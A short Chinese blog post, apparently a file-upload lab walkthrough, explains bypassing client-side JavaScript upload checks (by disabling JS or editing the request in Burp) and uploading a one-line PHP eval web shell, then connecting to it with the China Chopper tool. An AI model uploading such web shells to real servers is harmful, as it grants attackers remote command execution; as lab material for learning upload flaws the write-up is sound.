文件上传——不为人知的木马上传大法

其他 2019-05-25 12:11:24 阅读次数: 0

文件上传第一式（禁JS）

（1）来到第一关，我们查看源代码：

上图可以发现，上传的限制代码块写在js函数内，因此我们可以考虑将js的开关禁掉，直接上传木马的方式，其实，似乎也可以不禁js，直接burp抓包后修改图片类型，一样可以上传成功。

（2）上传一句话木马.php

<?php eval($_POST['cmd']);?>

（3）使用菜刀对木马进行连接

如下为菜刀连接效果图：

猜你喜欢

转载自www.cnblogs.com/cute-puli/p/10921922.html

文件上传——不为人知的木马上传大法

Eclipse Debug不为人知的秘密

Hibernate中不为人知的细节

你不为人知的秘事

Fragment不为人知的细节

前端不为人知的秘密

不为人知的springboot的技巧

面试那些不为人知的(套路)

JS中()不为人知的作用

Jmeter 不为人知的细节

Sublime与Verilog的不为人知的秘密

AQS那些不为人知的细节

ConcurrentHashMap那些不为人知的细节

ThreadLocal那些不为人知的细节

git merge 不为人知的秘密

神奇的python，不为人知的地方

不为人知的数组遍历

万能头文件里面的一些不为人知的函数

JetBrains 里不为人知的秘密(4)

CSS3那些不为人知的高级属性

Python一些不为人知的基础技巧

iView 近期的更新，以及那些“不为人知”的故事

Linux 不为人知的12大内幕

揭秘360背后不为人知的产品文化

音量调节不为人知的小技巧

揭秘币圈那些不为人知的黑幕

html之table&select不为人知的操作

ForeSpider不为人知的一面

ES6不为人知的操作

二级指针与ARC不为人知的特性

今日推荐

周排行

Leetcode简单题61~80

解决zookeeper磁盘IO高的问题

多线程相关方法详解

Maven-setting.xml文件详解

Maven 项目的 classpath 理解

渊亭科技大数据笔试题

配置JVM内存分配

计算机网络个人学习笔记（三）网络层：第三部分连载

js中两个等号(==)和三个等号(===)的区别

用C程序自动打开电脑上的程序

每日归档

更多

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)